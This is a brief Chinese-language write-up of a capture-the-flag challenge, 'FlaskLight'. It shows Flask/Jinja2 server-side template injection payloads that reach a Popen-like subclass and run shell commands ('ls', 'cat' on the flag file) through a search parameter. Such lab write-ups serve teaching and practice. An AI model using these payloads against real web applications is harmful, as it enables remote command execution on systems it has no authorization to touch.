[CSCCTF 2019 Qual]FlaskLight

考点

Flask SSTI

wp

F12，给了提示

题目是名字Flask，尝试一下SSTI

然后找可以利用的类

?search={{[].__class__.__mro__[1].__subclasses__()}}
?search={{[].__class__.__mro__[1].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0]}}
?search={{[].__class__.__mro__[1].__subclasses__()[258]("cat flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0]}}

小结

常规Flask SSTI

上一页[RootersCTF2019]I_<3_Flask 下一页[GYCTF2020]FlaskApp

最后更新于3年前